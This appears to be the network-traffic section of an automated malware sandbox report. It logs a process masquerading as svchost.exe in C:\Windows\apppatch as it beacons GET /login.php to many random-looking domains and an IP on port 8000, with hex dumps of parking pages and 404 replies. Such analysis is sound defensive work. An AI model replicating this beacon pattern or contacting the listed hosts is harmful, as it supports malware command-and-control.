                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.574848890 CET290OUTGET /dh/147287063_134827.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 106.15.232.163:8000
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.866720915 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:44 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.129179955 CET290OUTGET /dh/147287063_134827.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 106.15.232.163:8000
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.397111893 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:05 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.778120995 CET290OUTGET /dh/147287063_134827.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 106.15.232.163:8000
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Nov 11, 2024 18:08:06.049734116 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:05 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            20192.168.2.95696076.223.67.189807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.905108929 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qexyhuv.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.335303068 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:48 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 114
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            21192.168.2.95696164.225.91.73807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.970525980 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galynuh.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.525259018 CET816INHTTP/1.1 200 OK
                                                                                                                                                                                                            server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:48 GMT
                                                                                                                                                                                                            content-type: text/html
                                                                                                                                                                                                            content-length: 593
                                                                                                                                                                                                            last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                            etag: "63f68860-251"
                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            22192.168.2.956964103.224.212.210807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.088905096 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyxynyx.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.649300098 CET340INHTTP/1.1 302 Found
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:48 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            set-cookie: __tad=1731344868.1489616; expires=Thu, 09-Nov-2034 17:07:48 GMT; Max-Age=315360000
                                                                                                                                                                                                            location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0407-4879-ab0a-fce34aca034a
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            23192.168.2.95696544.221.84.105807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.115242004 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyciz.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.542262077 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:48 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f5ece37355d8c227499bb52001d4f4bb|66.23.206.109|1731344868|1731344868|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            24192.168.2.956966154.85.183.50807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.191951990 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.011537075 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:48 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.105601072 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.390928030 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:49 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.393544912 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.679491043 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:09 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.680655003 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.966717005 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:09 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            25192.168.2.956967103.224.182.252807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.236875057 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vofycot.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.799997091 CET338INHTTP/1.1 302 Found
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:48 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            set-cookie: __tad=1731344868.1504633; expires=Thu, 09-Nov-2034 17:07:48 GMT; Max-Age=315360000
                                                                                                                                                                                                            location: http://ww16.vofycot.com/login.php?sub1=20241112-0407-4817-b30f-e9d3a3931519
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            26192.168.2.95697664.190.63.136807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.433974028 CET348OUTGET /login.php?sub1=20241112-0407-4817-b30f-e9d3a3931519 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww16.vofycot.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1731344868.1504633
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115219116 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:50 GMT
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            transfer-encoding: chunked
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0FAmRW/Ag0BMutawvMN5/7T4vliKs+oYUVMd+Y55OnVzCkefKmzxOe8RFFzyuxXN6lNGB+yXV2H6NbLg+OVM3w==
                                                                                                                                                                                                            last-modified: Mon, 11 Nov 2024 17:07:49 GMT
                                                                                                                                                                                                            x-cache-miss-from: parking-7596689c44-ptvfg
                                                                                                                                                                                                            server: Parking/1.0
                                                                                                                                                                                                            Data Raw: 38 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 30 46 41 6d 52 57 2f 41 67 30 42 4d 75 74 61 77 76 4d 4e 35 2f 37 54 34 76 6c 69 4b 73 2b 6f 59 55 56 4d 64 2b 59 35 35 4f 6e 56 7a 43 6b 65 66 4b 6d 7a 78 4f 65 38 52 46 46 7a 79 75 78 58 4e 36 6c 4e 47 42 2b 79 58 56 32 48 36 4e 62 4c 67 2b 4f 56 4d 33 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
